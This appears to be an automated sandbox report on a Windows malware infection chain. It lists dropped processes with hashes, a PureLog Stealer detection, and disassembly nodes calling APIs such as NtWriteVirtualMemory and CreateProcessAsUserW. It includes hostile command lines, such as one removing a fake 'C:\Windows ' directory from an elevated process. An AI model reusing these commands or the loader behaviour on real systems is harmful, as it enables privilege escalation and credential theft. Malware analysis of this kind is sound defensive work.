                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:41
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xee0000
                                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:46
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\Libraries\Juqmtmya.PIF
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\Public\Libraries\Juqmtmya.PIF"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                    File size:1'226'752 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:53F0663219E6091CECD600C59389711F
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:48
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0xee0000
                                                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:50
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                    File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:51
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                    File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000028.00000003.1748806295.00000000008E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:51
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x30000
                                                                                                                                                                                                                                                                                                                                                    File size:70'656 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                                                                                                                                                                    Start time:02:12:55
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                    File size:1'356'800 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:C00D0B962E95984AE63736DD9A6F990E
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                                                                                                                                                                                    Start time:02:13:15
                                                                                                                                                                                                                                                                                                                                                    Start date:26/11/2024
                                                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x2e0000
                                                                                                                                                                                                                                                                                                                                                    File size:665'670'656 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5 hash:A89798786670C9BBB806311854859FF3
                                                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                                                                                      Execution Coverage:15%
                                                                                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                      Signature Coverage:26.7%
                                                                                                                                                                                                                                                                                                                                                      Total number of Nodes:1856
                                                                                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:15
                                                                                                                                                                                                                                                                                                                                                      execution_graph 34124 2d1c350 34127 2d0f7c8 34124->34127 34128 2d0f7d0 34127->34128 34128->34128 34129 2d0f7d7 34128->34129 36555 2d088b8 LoadLibraryW 34129->36555 34131 2d0f7f1 36560 2cf2ee0 QueryPerformanceCounter 34131->36560 34133 2d0f7f6 34134 2d0f800 InetIsOffline 34133->34134 34135 2d0f80a 34134->34135 34136 2d0f81b 34134->34136 36572 2cf4530 34135->36572 34138 2cf4530 11 API calls 34136->34138 34139 2d0f819 34138->34139 36563 2cf4860 34139->36563 36578 2d08274 36555->36578 36557 2d088f1 36589 2d07d78 36557->36589 36561 2cf2eed 36560->36561 36562 2cf2ef8 GetTickCount 36560->36562 36561->34133 36562->34133 36564 2cf4871 36563->36564 36565 2cf48ae 36564->36565 36566 2cf4897 36564->36566 36568 2cf45a0 11 API calls 36565->36568 36567 2cf4bcc 11 API calls 36566->36567 36570 2cf48a4 36567->36570 36568->36570 36569 2cf48df 36570->36569 36571 2cf4530 11 API calls 36570->36571 36571->36569 36573 2cf4534 36572->36573 36576 2cf4544 36572->36576 36575 2cf45a0 11 API calls 36573->36575 36573->36576 36574 2cf4572 36574->34139 36575->36576 36576->36574 36577 2cf2c2c 11 API calls 36576->36577 36577->36574 36579 2cf4530 11 API calls 36578->36579 36580 2d08299 36579->36580 36603 2d0798c 36580->36603 36584 2d082b3 36585 2d082bb GetModuleHandleW GetProcAddress GetProcAddress 36584->36585 36586 2d082ee 36585->36586 36624 2cf4500 36586->36624 36590 2cf4530 11 API calls 36589->36590 36591 2d07d9d 36590->36591 36592 2d0798c 12 API calls 36591->36592 36593 2d07daa 36592->36593 36594 2cf47ec 11 API calls 36593->36594 36595 2d07dba 36594->36595 36666 2d081cc 36595->36666 36598 2d08274 15 API calls 36599 2d07dd3 NtWriteVirtualMemory 36598->36599 36600 2d07dff 36599->36600 36601 2cf4500 11 API calls 36600->36601 36602 2d07e0c FreeLibrary 36601->36602 36602->34131 36604 2d0799d 36603->36604 36628 2cf4bcc 36604->36628 36606 2d07a19 36609 2cf47ec 36606->36609 36607 2d079ad 36607->36606 36637 2cfbabc CharNextA 36607->36637 36610 2cf4851 36609->36610 36611 2cf47f0 36609->36611 36612 2cf47f8 36611->36612 36613 2cf4530 36611->36613 36612->36610 36615 2cf4807 36612->36615 36618 2cf4530 11 API calls 36612->36618 36616 2cf45a0 11 API calls 36613->36616 36619 2cf4544 36613->36619 36614 2cf4572 36614->36584 36617 2cf45a0 11 API calls 36615->36617 36616->36619 36621 2cf4821 36617->36621 36618->36615 36619->36614 36620 2cf2c2c 11 API calls 36619->36620 36620->36614 36622 2cf4530 11 API calls 36621->36622 36623 2cf484d 36622->36623 36623->36584 36625 2cf4506 36624->36625 36626 2cf452c 36625->36626 36627 2cf2c2c 11 API calls 36625->36627 36626->36557 36627->36625 36629 2cf4bd9 36628->36629 36630 2cf4c09 36628->36630 36632 2cf4c02 36629->36632 36635 2cf4be5 36629->36635 36644 2cf44dc 36630->36644 36639 2cf45a0 36632->36639 36634 2cf4bf3 36634->36607 36638 2cf2c44 11 API calls 36635->36638 36637->36607 36638->36634 36640 2cf45c8 36639->36640 36641 2cf45a4 36639->36641 36640->36630 36648 2cf2c10 36641->36648 36643 2cf45b1 36643->36630 36645 2cf44e2 36644->36645 36647 2cf44fd 36644->36647 36645->36647 36657 2cf2c2c 36645->36657 36647->36634 36649 2cf2c14 36648->36649 36649->36643 36650 2cf2c1e 36649->36650 36651 2cf2d19 36649->36651 36655 2cf6520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 36649->36655 36650->36643 36656 2cf2ce8 7 API calls 36651->36656 36654 2cf2d3a 36654->36643 36655->36651 36656->36654 36658 2cf2c3a 36657->36658 36659 2cf2c30 36657->36659 36658->36647 36659->36658 36660 2cf2d19 36659->36660 36664 2cf6520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 36659->36664 36665 2cf2ce8 7 API calls 36660->36665 36663 2cf2d3a 36663->36647 36664->36660 36665->36663 36667 2cf4530 11 API calls 36666->36667 36668 2d081ef 36667->36668 36669 2d0798c 12 API calls 36668->36669 36670 2d081fc 36669->36670 36671 2d08204 GetModuleHandleA 36670->36671 36672 2d08274 15 API calls 36671->36672 36673 2d08215 GetModuleHandleA 36672->36673 36674 2d08233 36673->36674 36675 2cf44dc 11 API calls 36674->36675 36676 2d07dcd 36675->36676 36676->36598 36677 2cf4edc 36678 2cf4ee9 36677->36678 36681 2cf4ef0 36677->36681 36683 2cf4c38 36678->36683 36689 2cf4c50 36681->36689 36684 2cf4c4c 36683->36684 36685 2cf4c3c SysAllocStringLen 36683->36685 36684->36681 36685->36684 36686 2cf4c30 36685->36686 36687 2cf4f3c 36686->36687 36688 2cf4f26 SysAllocStringLen 36686->36688 36687->36681 36688->36686 36688->36687 36690 2cf4c5c 36689->36690 36691 2cf4c56 SysFreeString 36689->36691 36691->36690 36692 2cf1c6c 36693 2cf1c7c 36692->36693 36694 2cf1d04 36692->36694 36695 2cf1c89 36693->36695 36696 2cf1cc0 36693->36696 36697 2cf1d0d 36694->36697 36698 2cf1f58 36694->36698 36699 2cf1c94 36695->36699 36740 2cf1724 36695->36740 36703 2cf1724 10 API calls 36696->36703 36701 2cf1d25 36697->36701 36702 2cf1e24 36697->36702 36700 2cf1fec 36698->36700 36705 2cf1fac 36698->36705 36706 2cf1f68 36698->36706 36707 2cf1d2c 36701->36707 36713 2cf1d48 36701->36713 36715 2cf1dfc 36701->36715 36717 2cf1e55 Sleep 36702->36717 36723 2cf1e7c 36702->36723 36724 2cf1e95 36702->36724 36708 2cf1cd7 36703->36708 36709 2cf1fb2 36705->36709 36714 2cf1724 10 API calls 36705->36714 36711 2cf1724 10 API calls 36706->36711 36727 2cf1a8c 8 API calls 36708->36727 36729 2cf1cfd 36708->36729 36710 2cf1ca1 36728 2cf1cb9 36710->36728 36764 2cf1a8c 36710->36764 36730 2cf1f82 36711->36730 36712 2cf1724 10 API calls 36721 2cf1f2c 36712->36721 36718 2cf1d9c 36713->36718 36719 2cf1d79 Sleep 36713->36719 36731 2cf1fc1 36714->36731 36716 2cf1724 10 API calls 36715->36716 36733 2cf1e05 36716->36733 36722 2cf1e6f Sleep 36717->36722 36717->36723 36719->36718 36720 2cf1d91 Sleep 36719->36720 36720->36713 36721->36724 36732 2cf1a8c 8 API calls 36721->36732 36722->36702 36723->36712 36723->36724 36726 2cf1e1d 36727->36729 36734 2cf1a8c 8 API calls 36730->36734 36738 2cf1fa7 36730->36738 36735 2cf1a8c 8 API calls 36731->36735 36731->36738 36736 2cf1f50 36732->36736 36733->36726 36737 2cf1a8c 8 API calls 36733->36737 36734->36738 36739 2cf1fe4 36735->36739 36737->36726 36741 2cf1968 36740->36741 36751 2cf173c 36740->36751 36742 2cf1938 36741->36742 36743 2cf1a80 36741->36743 36748 2cf1947 Sleep 36742->36748 36750 2cf1986 36742->36750 36745 2cf1a89 36743->36745 36746 2cf1684 VirtualAlloc 36743->36746 36744 2cf174e 36747 2cf175d 36744->36747 36755 2cf182c 36744->36755 36758 2cf180a Sleep 36744->36758 36745->36710 36749 2cf16af 36746->36749 36756 2cf16bf 36746->36756 36747->36710 36748->36750 36752 2cf195d Sleep 36748->36752 36781 2cf1644 36749->36781 36759 2cf15cc VirtualAlloc 36750->36759 36761 2cf19a4 36750->36761 36751->36744 36754 2cf17cb Sleep 36751->36754 36752->36742 36754->36744 36757 2cf17e4 Sleep 36754->36757 36763 2cf1838 36755->36763 36787 2cf15cc 36755->36787 36756->36710 36757->36751 36758->36755 36760 2cf1820 Sleep 36758->36760 36759->36761 36760->36744 36761->36710 36763->36710 36765 2cf1b6c 36764->36765 36766 2cf1aa1 36764->36766 36767 2cf16e8 36765->36767 36768 2cf1aa7 36765->36768 36766->36768 36771 2cf1b13 Sleep 36766->36771 36770 2cf1c66 36767->36770 36774 2cf1644 2 API calls 36767->36774 36769 2cf1ab0 36768->36769 36773 2cf1b4b Sleep 36768->36773 36777 2cf1b81 36768->36777 36769->36728 36770->36728 36771->36768 36772 2cf1b2d Sleep 36771->36772 36772->36766 36775 2cf1b61 Sleep 36773->36775 36773->36777 36776 2cf16f5 VirtualFree 36774->36776 36775->36768 36778 2cf170d 36776->36778 36779 2cf1c00 VirtualFree 36777->36779 36780 2cf1ba4 36777->36780 36778->36728 36779->36728 36780->36728 36782 2cf1681 36781->36782 36783 2cf164d 36781->36783 36782->36756 36783->36782 36784 2cf164f Sleep 36783->36784 36785 2cf1664 36784->36785 36785->36782 36786 2cf1668 Sleep 36785->36786 36786->36783 36791 2cf1560 36787->36791 36789 2cf15d4 VirtualAlloc 36790 2cf15eb 36789->36790 36790->36763 36792 2cf1500 36791->36792 36792->36789 36793 2d13e12 36794 2cf4860 11 API calls 36793->36794 36795 2d13e33 36794->36795 36796 2d13e4b 36795->36796 36797 2cf47ec 11 API calls 36796->36797 36798 2d13e6a 36797->36798 36799 2d13e82 36798->36799 38339 2d089d0 36799->38339 36804 2cf4860 11 API calls 36805 2d13ee0 36804->36805 36806 2d13eeb 36805->36806 36807 2d13ef7 36806->36807 36808 2cf4860 11 API calls 36807->36808 36809 2d13f18 36808->36809 36810 2d13f23 36809->36810 36811 2d13f30 36810->36811 36812 2cf47ec 11 API calls 36811->36812 36813 2d13f4f 36812->36813 36814 2d13f67 36813->36814 36815 2d089d0 20 API calls 36814->36815 36816 2d13f73 36815->36816 36817 2cf4860 11 API calls 36816->36817 36818 2d13f94 36817->36818 36819 2d13f9f 36818->36819 36820 2d13fac 36819->36820 36821 2cf47ec 11 API calls 36820->36821 36822 2d13fcb 36821->36822 36823 2d13fe3 36822->36823 36824 2d089d0 20 API calls 36823->36824 36825 2d13fef 36824->36825 36826 2cf4860 11 API calls 36825->36826 36827 2d14010 36826->36827 36828 2d1401b 36827->36828 36829 2d14028 36828->36829 36830 2cf47ec 11 API calls 36829->36830 36831 2d14047 36830->36831 36832 2d14052 36831->36832 36833 2d1405f 36832->36833 36834 2d089d0 20 API calls 36833->36834 36835 2d1406b 36834->36835 38359 2d0e358 36835->38359 36838 2d14091 36839 2d140a2 36838->36839 38364 2d0dc8c 36839->38364 36842 2cf4860 11 API calls 36843 2d140f1 36842->36843 36844 2d140fc 36843->36844 36845 2cf47ec 11 API calls 36844->36845 36846 2d14128 36845->36846 36847 2d14133 36846->36847 36848 2d089d0 20 API calls 36847->36848 36849 2d1414c 36848->36849 36850 2cf4860 11 API calls 36849->36850 36851 2d1416d 36850->36851 36852 2cf47ec 11 API calls 36851->36852 36853 2d141a4 36852->36853 36854 2d141af 36853->36854 36855 2d089d0 20 API calls 36854->36855 36856 2d141c8 36855->36856 36857 2d088b8 20 API calls 36856->36857 36858 2d141cd 36857->36858 36859 2d141d7 36858->36859 38379 2d0e678 36859->38379 36862 2cf4860 11 API calls 36863 2d14217 36862->36863 36864 2d1422f 36863->36864 36865 2cf47ec 11 API calls 36864->36865 36866 2d1424e 36865->36866 36867 2d14259 36866->36867 36868 2d089d0 20 API calls 36867->36868 36869 2d14272 Sleep 36868->36869 36870 2cf4860 11 API calls 36869->36870 36871 2d1429d 36870->36871 36872 2d142b5 36871->36872 36873 2cf47ec 11 API calls 36872->36873 36874 2d142d4 36873->36874 36875 2d142df 36874->36875 38518 2cf46d4 36875->38518 38340 2d089e4 38339->38340 38341 2d081cc 17 API calls 38340->38341 38342 2d08a1d 38341->38342 38343 2d08274 15 API calls 38342->38343 38344 2d08a36 38343->38344 38345 2d07d78 18 API calls 38344->38345 38346 2d08a95 38345->38346 38520 2d08338 38346->38520 38349 2d08abc 38350 2cf4500 11 API calls 38349->38350 38351 2d08ac9 38350->38351 38352 2d0f094 38351->38352 38354 2d0f0b9 38352->38354 38353 2d0f0e5 38356 2cf44dc 11 API calls 38353->38356 38354->38353 38532 2cf46c4 11 API calls 38354->38532 38533 2cf4530 11 API calls 38354->38533 38357 2d0f0fa 38356->38357 38357->36804 38360 2cf4bcc 11 API calls 38359->38360 38361 2d0e370 38360->38361 38362 2d0e391 38361->38362 38534 2cf49f8 38361->38534 38362->36838 38365 2d0dca2 38364->38365 38540 2cf4f20 38365->38540 38367 2d0dcaa 38368 2d0dcca RtlDosPathNameToNtPathName_U 38367->38368 38544 2d0dbdc 38368->38544 38370 2d0dce6 NtCreateFile 38371 2d0dd11 38370->38371 38372 2cf49f8 11 API calls 38371->38372 38373 2d0dd23 NtWriteFile NtClose 38372->38373 38374 2d0dd4d 38373->38374 38545 2cf4c60 38374->38545 38377 2cf44dc 11 API calls 38378 2d0dd5d Sleep 38377->38378 38378->36842 38380 2d0e681 38379->38380 38380->38380 38381 2cf4860 11 API calls 38380->38381 38382 2d0e6ca 38381->38382 38383 2cf47ec 11 API calls 38382->38383 38384 2d0e6ef 38383->38384 38385 2d089d0 20 API calls 38384->38385 38386 2d0e70a 38385->38386 38387 2cf4860 11 API calls 38386->38387 38388 2d0e723 38387->38388 38389 2cf47ec 11 API calls 38388->38389 38390 2d0e748 38389->38390 38391 2d089d0 20 API calls 38390->38391 38392 2d0e763 38391->38392 38393 2cf4860 11 API calls 38392->38393 38394 2d0e77c 38393->38394 38395 2cf47ec 11 API calls 38394->38395 38396 2d0e7a1 38395->38396 38397 2d089d0 20 API calls 38396->38397 38398 2d0e7bc 38397->38398 38399 2cf4860 11 API calls 38398->38399 38400 2d0e7ee 38399->38400 38401 2d089d0 20 API calls 38400->38401 38402 2d0e838 38401->38402 38403 2cf4860 11 API calls 38402->38403 38404 2d0e86f 38403->38404 38405 2cf47ec 11 API calls 38404->38405 38406 2d0e894 38405->38406 38407 2d089d0 20 API calls 38406->38407 38408 2d0e8af 38407->38408 38409 2cf4860 11 API calls 38408->38409 38410 2d0e8c8 38409->38410 38411 2cf47ec 11 API calls 38410->38411 38412 2d0e8ed 38411->38412 38413 2d089d0 20 API calls 38412->38413 38414 2d0e908 38413->38414 38415 2cf4860 11 API calls 38414->38415 38416 2d0e921 38415->38416 38417 2cf47ec 11 API calls 38416->38417 38418 2d0e946 38417->38418 38419 2d089d0 20 API calls 38418->38419 38420 2d0e961 38419->38420 38548 2cf7f2c 38420->38548 38422 2d0e985 38552 2d08788 38422->38552 38425 2cf4860 11 API calls 38426 2d0ea0a 38425->38426 38427 2cf47ec 11 API calls 38426->38427 38428 2d0ea3b 38427->38428 38429 2d089d0 20 API calls 38428->38429 38430 2d0ea5f 38429->38430 38431 2cf4860 11 API calls 38430->38431 38432 2d0ea7b 38431->38432 38433 2cf47ec 11 API calls 38432->38433 38434 2d0eaac 38433->38434 38435 2d089d0 20 API calls 38434->38435 38436 2d0ead0 38435->38436 38437 2cf4860 11 API calls 38436->38437 38438 2d0eaec 38437->38438 38439 2cf47ec 11 API calls 38438->38439 38440 2d0eb1d 38439->38440 38441 2d089d0 20 API calls 38440->38441 38442 2d0eb41 38441->38442 38443 2cf4860 11 API calls 38442->38443 38444 2d0eb5d 38443->38444 38445 2cf47ec 11 API calls 38444->38445 38446 2d0eb7b 38445->38446 38564 2d0894c LoadLibraryW 38446->38564 38449 2cf4860 11 API calls 38450 2d0ebac 38449->38450 38451 2cf47ec 11 API calls 38450->38451 38452 2d0ebca 38451->38452 38453 2d0894c 21 API calls 38452->38453 38454 2d0ebdf 38453->38454 38455 2cf4860 11 API calls 38454->38455 38456 2d0ebfb 38455->38456 38457 2cf47ec 11 API calls 38456->38457 38458 2d0ec19 38457->38458 38459 2d0894c 21 API calls 38458->38459 38460 2d0ec2e 38459->38460 38461 2cf4860 11 API calls 38460->38461 38462 2d0ec4a 38461->38462 38463 2cf47ec 11 API calls 38462->38463 38464 2d0ec68 38463->38464 38465 2d0894c 21 API calls 38464->38465 38466 2d0ec7d 38465->38466 38467 2d0eee2 38466->38467 38468 2d0ec87 38466->38468 38470 2cf4500 11 API calls 38467->38470 38469 2cf4860 11 API calls 38468->38469 38473 2d0eca3 38469->38473 38471 2d0eeff 38470->38471 38472 2cf4c60 SysFreeString 38471->38472 38474 2d0ef0a 38472->38474 38476 2cf47ec 11 API calls 38473->38476 38475 2cf4500 11 API calls 38474->38475 38477 2d0ef1a 38475->38477 38482 2d0ecd4 38476->38482 38478 2cf4c60 SysFreeString 38477->38478 38479 2d0ef22 38478->38479 38480 2cf4500 11 API calls 38479->38480 38481 2d0ef2f 38480->38481 38481->36862 38483 2d089d0 20 API calls 38482->38483 38484 2d0ecf8 38483->38484 38485 2cf4860 11 API calls 38484->38485 38486 2d0ed14 38485->38486 38487 2cf47ec 11 API calls 38486->38487 38488 2d0ed45 38487->38488 38489 2d089d0 20 API calls 38488->38489 38490 2d0ed69 WaitForSingleObject CloseHandle CloseHandle 38489->38490 38491 2cf4860 11 API calls 38490->38491 38492 2d0eda0 38491->38492 38493 2cf47ec 11 API calls 38492->38493 38494 2d0edbe 38493->38494 38495 2d0894c 21 API calls 38494->38495 38496 2d0edd3 38495->38496 38497 2cf4860 11 API calls 38496->38497 38498 2d0edef 38497->38498 38499 2cf47ec 11 API calls 38498->38499 38500 2d0ee0d 38499->38500 38501 2d0894c 21 API calls 38500->38501 38502 2d0ee22 38501->38502 38503 2cf4860 11 API calls 38502->38503 38504 2d0ee3e 38503->38504 38505 2cf47ec 11 API calls 38504->38505 38506 2d0ee5c 38505->38506 38507 2d0894c 21 API calls 38506->38507 38508 2d0ee71 38507->38508 38509 2cf4860 11 API calls 38508->38509 38510 2d0ee8d 38509->38510 38511 2cf47ec 11 API calls 38510->38511 38512 2d0eeab 38511->38512 38513 2d0894c 21 API calls 38512->38513 38514 2d0eec0 38513->38514 38515 2d0894c 21 API calls 38514->38515 38516 2d0eed1 38515->38516 38517 2d0894c 21 API calls 38516->38517 38517->38467 38519 2cf46da 38518->38519 38519->38519 38521 2cf4530 11 API calls 38520->38521 38522 2d0835b 38521->38522 38523 2cf4860 11 API calls 38522->38523 38524 2d0837a 38523->38524 38525 2d081cc 17 API calls 38524->38525 38526 2d0838d 38525->38526 38527 2d08274 15 API calls 38526->38527 38528 2d08393 FlushInstructionCache 38527->38528 38529 2d083b9 38528->38529 38530 2cf44dc 11 API calls 38529->38530 38531 2d083c1 FreeLibrary 38530->38531 38531->38349 38532->38354 38533->38354 38535 2cf49ac 38534->38535 38536 2cf45a0 11 API calls 38535->38536 38538 2cf49e7 38535->38538 38537 2cf49c3 38536->38537 38537->38538 38539 2cf2c2c 11 API calls 38537->38539 38538->38361 38539->38538 38541 2cf4f3c 38540->38541 38542 2cf4f26 SysAllocStringLen 38540->38542 38541->38367 38542->38541 38543 2cf4c30 38542->38543 38543->38540 38544->38370 38546 2cf4c66 SysFreeString 38545->38546 38547 2cf4c74 38545->38547 38546->38547 38547->38377 38549 2cf7f3f 38548->38549 38571 2cf4a00 38549->38571 38553 2cf4530 11 API calls 38552->38553 38554 2d087ab 38553->38554 38555 2cf4860 11 API calls 38554->38555 38556 2d087ca 38555->38556 38557 2d081cc 17 API calls 38556->38557 38558 2d087dd 38557->38558 38559 2d08274 15 API calls 38558->38559 38560 2d087e3 CreateProcessAsUserW 38559->38560 38561 2d08827 38560->38561 38562 2cf44dc 11 API calls 38561->38562 38563 2d0882f 38562->38563 38563->38425 38565 2d08973 GetProcAddress 38564->38565 38566 2d089bb 38564->38566 38567 2d089b0 FreeLibrary 38565->38567 38568 2d0898d 38565->38568 38566->38449 38567->38566 38569 2d07d78 18 API calls 38568->38569 38570 2d089a5 38569->38570 38570->38567 38572 2cf4a32 38571->38572 38574 2cf4a05 38571->38574 38573 2cf44dc 11 API calls 38572->38573 38577 2cf4a28 38573->38577 38574->38572 38575 2cf4a19 38574->38575 38578 2cf45cc 38575->38578 38577->38422 38579 2cf45a0 11 API calls 38578->38579 38580 2cf45dc 38579->38580 38581 2cf44dc 11 API calls 38580->38581 38582 2cf45f4 38581->38582 38582->38577 38583 2d17074 38584 2cf4860 11 API calls 38583->38584 38585 2d17095 38584->38585 38586 2cf47ec 11 API calls 38585->38586 38587 2d170cc 38586->38587 38588 2d089d0 20 API calls 38587->38588 38589 2d170f0 38588->38589 38590 2cf4860 11 API calls 38589->38590 38591 2d17111 38590->38591 38592 2cf47ec 11 API calls 38591->38592 38593 2d17148 38592->38593 38594 2d089d0 20 API calls 38593->38594 38595 2d1716c 38594->38595 38596 2cf4860 11 API calls 38595->38596 38597 2d1718d 38596->38597 38598 2cf47ec 11 API calls 38597->38598 38599 2d171c4 38598->38599 38600 2d089d0 20 API calls 38599->38600 38601 2d171e8 38600->38601 38602 2cf4860 11 API calls 38601->38602 38603 2d17209 38602->38603 38604 2cf47ec 11 API calls 38603->38604 38605 2d17240 38604->38605 38606 2d089d0 20 API calls 38605->38606 38607 2d17264 